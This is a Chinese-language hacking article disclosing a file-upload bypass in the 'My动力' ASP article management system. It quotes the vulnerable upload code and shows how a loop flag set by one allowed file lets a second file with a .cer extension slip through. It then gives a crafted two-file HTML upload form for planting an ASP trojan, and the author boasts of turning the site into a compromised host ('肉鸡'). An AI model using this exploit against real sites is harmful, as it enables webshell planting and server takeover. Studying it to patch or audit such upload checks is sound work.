公开动力文章系统漏洞的相关文章

一．概述
        My动力文章管理系统是由asp163.net开发的一套文章管理系统，最近由于要做个网站就对他的代码研究了一下，呵呵，虽然webboy对My动力做了不少安全措施，防止了可能的sqlinjection攻击，但这样似乎给人一种非常安全的错觉，我们一起来分析一下吧。
        我们先到网站上面注册一个用户，进入用户的文章管理看看,可以添加软件，添加图片……,看看可以上传东西吧，但是My动力文件管理系统似乎限制只允许已定义的文件后缀上传，如软件只允许rar|zip|exe|mpg|rm|wav|mid格式，有没有办法突破呢？
二．漏洞详细分析过程
        其实仔细研究一下是发现有可能上传ASP文件的！大家看Upfile_Soft.asp的这一段代码（其他用于上传的文件类似）：
const UpFileType="rar|zip|exe|mpg|rm|wav|mid"        "定义了可以上传的文件类型
...
dim EnableUpload         "定义了是否允许上传的关键变量
...
FoundErr=false        "默认FoundErr变量为假，即没有发现错误（哈哈，关键变量哦，看下面）
EnableUpload=false        "默认EnableUpload变量为假，即不能上传（哈哈，关键变量哦）
...
for each formName in upload.file"列出所有上传了的文件（！关键，注意这个FOR循环！）
set ofile=upload.file(formName)          "生成一个文件对象
...
arrUpFileType=split(UpFileType,"|")        "取得定义的可以上传的后缀名                
for i=0 to ubound(arrUpFileType)
if fileEXT=trim(arrUpFileType(i)) then
EnableUpload=true        "hoho，EnableUpload变量改变了！
exit for
end if
next
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then "呵呵，只要是ASP，ASA，ASPX的后缀就废掉了，难怪海洋顶端上不去阿！
EnableUpload=false
end if
if EnableUpload=false then
msg="这种文件类型不允许上传！ 只允许上传这几种文件类型：" & UpFileType
FoundErr=true                        "hoho，FoundErr变量改变了！
end if
...
if FoundErr<>true then                        "又是一个重要地方，看来FoundErr变量是能否上传的关键，那如何决定FoundErr变量呢？(草草虫ps:偶可以瞪大了眼睛看啊)
randomize
ranNum=int(900*rnd)+100        "生成一个随机数                filename=SavePath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt        "没有改变上传文件的后缀，爽阿
        ...
        ofile.SaveToFile Server.mappath(FileName)   "保存文件
        response.write "软件上传成功！软件大小为：" & cstr(round(oFileSize/1024)) & "K"
        strJS=strJS & "parent.document.myform.DownloadUrl1.value="" & fileName & "";" & vbcrlf        "晕拉~还返回上传后改的名字，这回好了，不用猜了。
        strJS=strJS & "parent.document.myform.SoftSize.value="" & cstr(round(oFileSize/1024)) & "";" & vbcrlf
    注：...表示省略了部分代码
    大家研究一下这段代码会发现，My动力使用了化境无组件上传类来上传，而化境的无组件上传类可以上传多个文件，for each formName in upload.file这一句就是用于取得所有form中取得的文件名。第二个for循环for i=0 to ubound(arrUpFileType)用于检测文件类型，如果不满足条件则关键变量EnableUpload为默认值false，而EnableUpload为默认值false时又导致关键变量FoundErr值得改变为true，我们的目的就是想办法避免FoundErr值的改变，让他保持默认值false，我们注意到if fileEXT=trim(arrUpFileType(i)) then这一句如果满足条件则EnableUpload为真，那么当有多个文件用于上传时，作者考虑到了么？显然是没有的，虽然各上传界面的都是只有一个上传提交框，但我们可以在本地自己构造阿~，如下图：

上传的附件

   _blank>20045172219674.jpg [ 99.56 KByte 1024×768 ] (缩略时请点击查看原图)

  

 
这样我们改变action到远程地址，提交两个文件的话，在asp文件中，第一个for循环检查第一个文件sql2reg.gif，第2个for循环检查文件后缀gif，显然满足条件因此可以上传EnableUpload=true，然后逐步跳过各语句，由于默认FoundErr=false，文件上传了！然后第一个for循环检查文件2：sqlexec.cer文件，第二个for循环发现不满足
文件后缀条件，跳过，我的文件不是asp等后缀，再跳过if语句，呵呵，EnableUpload变量保持为第一次循环的true值，这样保证了FoundErr也没改变，哈哈哈哈，木马上传成功！！！
    这里用了一个小技巧，大家肯定发现了，我的asp木马没用asp后缀，是因为程序作了限制，但是限制的不全，因为iis中调用asp文件的是asp.dll，asp.dll的应用程序映射还包括.cdx和.cerok拉，我们的.cer后缀一样可以运行。
三．小结Exploits 
    再总结一下发现过程，我们倒推一下，FoundErr变量决定能否上传而且只要保持默认值就可以上传，但EnableUpload变量决定了FoundErr的改变，只要能改变EnableUpload变量的默认值false就好了即要EnableUpload=true这一句执行，呵呵
看看怎样能改变EnableUpload的默认值，只有当fileEXT=trim(arrUpFileType(i))即文件后缀名满足条件，在第一个for循环中如果改变EnableUpload值的话，第二次循环中EnableUpload值也就会保持下来，从而FoundErr也保持为false。
四．攻击测试
        攻击方法，自己建立一个用户上传的叶面，如
<html><body>
<form action="_Soft.asp"" target=_blank>http://127.0.0.1:1234/Upfile_Soft.asp"; method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data">
  <input name="FileName1" type="FILE" class="tx1" size="40">
  <input name="FileName" type="FILE" class="tx1" size="40">
  <input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
</form></body></html>

上传的附件

   _blank>200451722191574.jpg [ 142.50 KByte 1024×768 ] (缩略时请点击查看原图)

  

 
上传结束，game over~。我们的动力，我的肉鸡……

其它附图:

上传的附件

   _blank>200451722192274.jpg [ 123.14 KByte 1024×768 ] (缩略时请点击查看原图)

  

上传的附件

   _blank>200451722192874.jpg [ 143.67 KByte 1024×768 ] (缩略时请点击查看原图)

  

上传的附件

   _blank>200451722193574.jpg [ 145.02 KByte 1024×768 ] (缩略时请点击查看原图)

  

源代码网整理以下